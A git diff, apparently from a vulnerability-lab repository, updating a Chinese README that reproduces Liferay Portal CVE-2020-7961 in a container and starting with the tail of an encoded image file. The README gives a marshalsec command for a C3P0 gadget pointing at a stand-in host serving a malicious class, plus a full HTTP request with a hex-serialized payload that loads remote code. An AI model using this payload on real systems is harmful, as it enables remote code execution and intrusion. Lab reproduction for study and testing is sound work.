zN~MHO&88kjr#~fQE0D=DD&gQch0k-w?PV^8YuGHr$7O$H z=;w@(0+x1aaEJ(_o@)pWxhe#Y}UBXT!0VTMLVR_$V9575yZ zhvTjj3dq44f8NO(M-2wz8Ho0y@1Hq|uFqKoc}-5k5GTNUm8j?AioHa|&xT6fpH^eVEHy-iu)U9{DYc-?p#p;Tj{FE-0*K@4D8NH_1P` z1!#dj@G9f>l;mL9VeYqZ>9IL5zt5G!n-Hh8LK?tG@cb%pbMB_GvT@GiWU-H-X=t!;IlvP0HwjzVt-7CMT)&DD{$N>vmY zF?%cle}uwbf2`}sJ%{6*7HJ}!ynPM0=1@>$q1Ua34j?yARGxp2!1ztCCT;OL0N*X@ z?P2?nY7#--+*6LnZSCa@RK$r?ikR)}!|*oy51Q{?NCDyNv%ikDO=^`kY*n}16%ClJ zROG}eKxs!wRo)w8R~%PSqwakHzj-EvzWOOo__gdxotpgMp<+Mth!qnarPgj$F!Ev3Sn{zQ_8qs`^T84ZQsaIk3?^HvO2Bky$I)K%z36ma(V^*`*m?SA-nFYhhVo?Dr6G;dCqr5`!@IDB%9x{DA?OWqvade@Hw_ fq}TsTZT%cJJ$0%cNHs?B4FOLy^wd9rZQlL|dp(k) literal 0 HcmV?d00001 diff --git a/liferay-portal/CVE-2020-7961/README.md b/liferay-portal/CVE-2020-7961/README.md index f65b8a9aca..e1c8c7bbd7 100644 --- a/liferay-portal/CVE-2020-7961/README.md +++ b/liferay-portal/CVE-2020-7961/README.md @@ -49,13 +49,13 @@ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` -我们使用利用链是com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,借助[marshalsec](https://github.com/mbechler/marshalsec)来生成一个Jackson的POC: +因为目标Java版本较高,我们使用利用链是com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,借助[marshalsec](https://github.com/mbechler/marshalsec)来生成一个适用于Jackson的POC: ``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://evil/ LifExp ``` -其中,`http://evil/`是保存了恶意class文件的Web服务,LifExp是恶意类名。 +其中,`http://evil/`是刚才启动的保存了恶意class文件的Web服务,LifExp是恶意类名。 ![](1.png) @@ -75,4 +75,10 @@ Content-Type: application/x-www-form-urlencoded Connection: close cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c6966457870740017687474703a2f2f3137322e31372e302e313a383030302f740003466f6f;"} -``` \ No newline at end of file +``` + +![](2.png) + +进入容器中查看,发现已经成功执行`touch /tmp/success`: + +![](3.png) \ No newline at end of file